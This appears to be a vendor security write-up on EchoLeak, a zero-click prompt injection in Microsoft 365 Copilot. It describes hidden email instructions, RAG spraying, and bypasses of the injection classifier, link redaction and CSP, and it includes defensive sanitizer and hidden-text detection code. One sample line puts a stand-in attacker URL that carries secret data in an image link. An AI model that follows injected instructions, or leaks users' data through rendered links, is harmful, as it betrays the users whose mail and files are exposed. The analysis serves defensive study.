
2025-06-12

High | Vendor post

EchoLeak CVE-2025-32711 — Zero-Click Prompt Injection in M365 Copilot Silently Exfiltrates Email, Teams, and SharePoint Data Without User Interaction

EchoLeak (CVE-2025-32711) is a zero-click indirect prompt injection in Microsoft 365 Copilot that silently exfiltrates email, Teams, OneDrive, and SharePoint data. Patched May 2026.

Microsoft 365 Copilot | Tool execution / MCP | Zero-click indirect prompt injection enabling AI context data exfiltration | Microsoft 365 Copilot RAG context window (Outlook, Teams, OneDrive, SharePoint, Office files)

What happened

An attacker sends a specially crafted email containing a hidden prompt payload. Copilot's RAG engine retrieves the email during a subsequent user query and executes the payload, exfiltrating emails, Teams messages, OneDrive files, and SharePoint documents to attacker-controlled endpoints via rendered markdown links and images.

Why it matters

EchoLeak demonstrated silent exfiltration of any data accessible to Copilot's context window (email content, Teams conversations, OneDrive files, SharePoint documents, and Office file contents) with no user awareness or interaction. It potentially affects all M365 enterprise tenants with Copilot enabled.

Missing authorization check

Retrieved document content and executable instructions were not sandboxed from one another. Copilot had no mechanism to distinguish legitimate user queries from injected instructions in retrieved email content. An authority gate requiring explicit user authorization for outbound data transmission to external URLs was absent.

Would PP block it?

The exfiltration path in EchoLeak operates through Copilot's response channel—markdown image and link rendering with sensitive data appended as query parameters—rather than through explicit tool calls or agent action APIs. PP's enforcement layer sits at the tool-call boundary and would not intercept exfiltration embedded in AI response text. This class of vulnerability requires response-layer sandboxing and content security controls, not action-level authorization receipts.
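One response-layer control of the kind described above, as an added example (not Microsoft's fix and not code from the original post): before rendering, strip any markdown link or image, inline or reference-style, whose URL is off the allowlist or carries a query string or fragment. `ALLOWED_HOSTS`, `url_is_safe`, `sanitize` and the sample response are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the only host this client may link to (constructed value).
ALLOWED_HOSTS = {"contoso.sharepoint.com"}

INLINE = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^\s)>]+)>?[^)]*\)")
REF_USE = re.compile(r"(!?)\[([^\]]*)\]\[([^\]]*)\]")
REF_DEF = re.compile(r"^ {0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$", re.M)

def url_is_safe(url):
    """https, allowlisted host, no query/fragment, no backslash (parsers disagree on it)."""
    try:
        p = urlsplit(url)
    except ValueError:
        return False
    return ("\\" not in url and p.scheme == "https" and not p.query
            and not p.fragment and (p.hostname or "").lower() in ALLOWED_HOSTS)

def sanitize(markdown):
    """Return (clean_markdown, blocked_urls) for one model response."""
    refs = {m.group(1).strip().lower(): m.group(2) for m in REF_DEF.finditer(markdown)}
    blocked = [u for u in refs.values() if not url_is_safe(u)]
    # Drop every definition so full, collapsed and shortcut references go inert.
    text = REF_DEF.sub("", markdown)

    def ref_use(m):
        url = refs.get((m.group(3) or m.group(2)).strip().lower())
        if url is None:
            return m.group(0)                            # undefined label: not a link
        if url_is_safe(url):
            return f"{m.group(1)}[{m.group(2)}]({url})"  # re-emit as an inline link
        return m.group(2)                                # keep the label, drop the URL

    def inline(m):
        if url_is_safe(m.group(3)):
            return m.group(0)
        blocked.append(m.group(3))
        return m.group(2)

    return INLINE.sub(inline, REF_USE.sub(ref_use, text)), blocked

# Constructed model response: one reference-style image and two inline links.
SAMPLE = ("Summary of the thread follows.\n![status][r1]\n"
          "See [the report](https://contoso.sharepoint.com/sites/fin/report.docx) "
          "or [details](https://contoso.sharepoint.com/redirect?u=SECRET_VALUE).\n\n"
          "[r1]: https://attacker.example/pixel.png?d=SECRET_VALUE\n")

if __name__ == "__main__":
    print(sanitize(SAMPLE))
```

The same URL check belongs on the renderer's parsed link nodes, since autolinks, bare URLs and raw HTML are not matched here. Path segments on an allowlisted host can still carry data, so the allowlist should name specific endpoints rather than whole domains where possible.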

Incident analysis

Timeline and technical read

Timeline

  1. 2025-06-12

    CVE-2025-32711 first publicly documented; EchoLeak named as the first zero-click indirect prompt injection demonstrated in a production M365 Copilot deployment.

  2. 2025-08-27

    Checkmarx publishes detailed technical breakdown of the zero-click attack chain, including XPIA classifier bypass, link/image redaction bypass, and CSP bypass techniques.

  3. 2025-09-06

    Academic paper published on arXiv documenting EchoLeak as the first known production LLM system with confirmed zero-click prompt injection data exfiltration capability.

  4. 2026-05-01

    Microsoft releases server-side patch addressing the EchoLeak vulnerability; no in-the-wild exploitation confirmed prior to patch.

  5. 2026-06-16

    EchoLeak resurfaces in enterprise security roundups alongside SearchLeak (CVE-2026-42824), a related one-click M365 Copilot exfiltration variant discovered by Varonis.

Technical breakdown

  • Indirect prompt injection via hidden email content (HTML comments or white-on-white text) invisible to users but parsed and retained by Copilot's LLM engine as instruction-level context.
  • RAG spraying: attacker injects malicious prompts into multiple emails or documents to increase the probability that one is retrieved during any Copilot query from the victim.
  • Three-layer bypass chain: XPIA classifier bypass (evading Microsoft's cross-prompt injection detection), link/image redaction bypass (reference-style markdown circumventing standard redaction), and CSP bypass (using allowed domains such as SharePoint and Teams).
  • Zero user interaction required: exfiltration triggers on any subsequent Copilot query where the RAG engine retrieves the poisoned email—the victim never clicks, opens, or acts on the malicious message.
  • Patched server-side by Microsoft in May 2026, but the underlying RAG context injection class of risk persists for any LLM system that does not separate retrieved content from the instruction channel.
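An input-side check for the hidden-content technique in the first bullet, as an added example (not part of the original post or Microsoft's mitigation): separate what a reader can see in an email body from HTML comments and invisibly styled text before the body is indexed for retrieval. The style heuristics, `split_email_html` and the sample email are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Heuristics (assumptions): invisible boxes, or white text with no background set.
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|"
                    r"(?:font-size|opacity)\s*:\s*0(?![.\d])", re.I)
WHITE = re.compile(r"(?<![-\w])color\s*:\s*(?:#fff(?:fff)?\b|white\b|"
                   r"rgb\(\s*255\s*,\s*255\s*,\s*255\s*\))", re.I)
VOID = {"br", "col", "hr", "img", "input", "link", "meta", "wbr"}

class VisibleText(HTMLParser):
    def __init__(self):
        super().__init__()
        self.stack, self.visible, self.hidden = [], [], []  # stack: (tag, hidden?)

    def handle_starttag(self, tag, attrs):
        if tag not in VOID:
            style = dict(attrs).get("style") or ""
            hide = (tag in ("script", "style") or bool(HIDDEN.search(style))
                    or (bool(WHITE.search(style)) and "background" not in style.lower())
                    or (bool(self.stack) and self.stack[-1][1]))  # inherit from parent
            self.stack.append((tag, hide))

    def handle_endtag(self, tag):
        for i in range(len(self.stack) - 1, -1, -1):  # tolerate unclosed children
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        if data.strip():
            hidden = bool(self.stack) and self.stack[-1][1]
            (self.hidden if hidden else self.visible).append(data.strip())

    def handle_comment(self, data):
        if data.strip():
            self.hidden.append(data.strip())

def split_email_html(html):
    """Return (visible_text, hidden_fragments) for one email body."""
    parser = VisibleText()
    parser.feed(html)
    parser.close()
    return " ".join(parser.visible), parser.hidden

# Constructed email body; the hidden strings are neutral placeholders.
SAMPLE = ('<p>Hi team, the Q3 onboarding guide is attached.</p><!-- constructed hidden text A -->'
          '<div style="color:#ffffff; font-size:1px">constructed hidden text B</div>'
          '<span style="display:none">constructed hidden text C</span>'
          '<p style="color:white; background:#003366">Contoso HR</p>')
```

Indexing only the visible text, and alerting when the hidden list is non-empty, removes this hiding place but does not by itself separate retrieved content from the instruction channel.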

Authorization boundary

Where the authorization boundary should have been

This incident is categorized as Tool execution / MCP. The relevant Permission Protocol gate is Tool-Call Gate. The read is conditional: the block only applies where the real action boundary is routed through a gate.

If enforced at: RAG context boundary / response rendering layer (outside PP scope)
Still needs: Response-channel data exfiltration via LLM output text; PP does not govern AI response content or outbound URL rendering in LLM-generated markdown
Receipt required for: N/A; the exfiltration path bypasses the tool-call layer where PP enforces and would require response-layer sandboxing controls

EchoLeak exploits the AI response rendering channel for exfiltration, not authorized tool calls. PP enforces action-layer authorization for agent tool calls; it does not govern what an LLM includes in its response text or which markdown URLs it renders.
